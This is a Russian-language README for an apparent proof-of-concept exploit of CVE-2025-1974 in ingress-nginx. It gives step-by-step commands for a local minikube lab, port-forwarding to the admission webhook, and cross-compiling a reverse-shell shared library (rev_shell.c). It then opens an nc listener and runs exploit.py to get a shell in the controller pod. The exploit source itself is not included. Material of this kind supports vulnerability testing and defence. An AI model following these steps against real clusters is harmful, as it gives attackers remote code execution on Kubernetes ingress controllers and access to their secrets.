
CVE-2025-1974 PoC код
Для локального тестирования устанавливаем minikube
minikube start --driver=docker
С помощью следующей команды настраиваем ingress-nginx-controller
kubectl apply -f ingress-nginx-controller.yml
Проверяем, что Pods работают корректно
kubectl get pods -n ingress-nginx
kubectl describe <pod name> -n ingress-nginx
Пробрасываем порты 80 и 8443 (webhook) Pods на локальные порты 8888 и 1337 (Требуется проброс обоих портов: 80 и 8443)
kubectl port-forward -n ingress-nginx <pod name> 8888:80
kubectl port-forward -n ingress-nginx <pod name> 1337:8443
В rev_shell.c измените IP и Port для подключения reverse shell
Необходимо скомпилировать под среду MacOS (arm64) и под целевую среду тестирования
aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c
# Установка кросс-компилятора
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu
Преобразование в формат AdmissionReview с помощью kube-review (json)
./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json
Подготовка к подключению reverse shell через nc
nc -lv 4444
В exploit.py измените host и port для nginx и webhook, затем выполните
python3 exploit.py
